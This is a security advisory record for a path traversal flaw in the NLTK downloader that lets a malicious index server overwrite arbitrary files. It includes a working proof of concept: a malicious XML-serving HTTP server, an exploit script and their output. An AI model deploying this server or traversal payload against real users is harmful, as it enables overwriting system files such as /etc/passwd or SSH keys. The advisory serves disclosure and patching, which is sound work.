"details": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n \u2193\n2. Provides malicious XML: \u003cpackage id=\"passwd\" subdir=\"../../etc\" .../\u003e\n \u2193\n3. Victim executes: downloader.download(\u0027passwd\u0027)\n \u2193\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n \u2193\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n \u2193\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n \u2193\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n \u2193\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\u003c?xml version=\"1.0\"?\u003e\n\u003cnltk_data\u003e\n \u003cpackages\u003e\n \u003cpackage id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n url=\"http://127.0.0.1:8888/test.zip\" \n size=\"100\" unzipped_size=\"100\" unzip=\"0\"/\u003e\n \u003c/packages\u003e\n\u003c/nltk_data\u003e\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == \u0027/malicious_index.xml\u0027:\n self.send_response(200)\n self.send_header(\u0027Content-type\u0027, \u0027application/xml\u0027)\n self.end_headers()\n with open(os.path.join(server_dir, \u0027malicious_index.xml\u0027), \u0027rb\u0027) as f:\n self.wfile.write(f.read())\n elif self.path == \u0027/test.zip\u0027:\n self.send_response(200)\n self.send_header(\u0027Content-type\u0027, \u0027application/zip\u0027)\n self.end_headers()\n with open(os.path.join(server_dir, \u0027test.zip\u0027), \u0027rb\u0027) as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n\u2717 Exploit successful! File written to: {expected_path}\")\n print(f\"\u2717 Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n\u2717 Exploit successful! File written to: /tmp/test_file.zip\n\u2717 Path traversal attack successful!\n```",
"id": "GHSA-469j-vmhf-r6v7",
"modified": "2026-03-25T18:21:27Z",
"published": "2026-03-19T12:42:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33236"
},
{
"type": "WEB",
"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
},
{
"type": "PACKAGE",
"url": "https://github.com/nltk/nltk"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.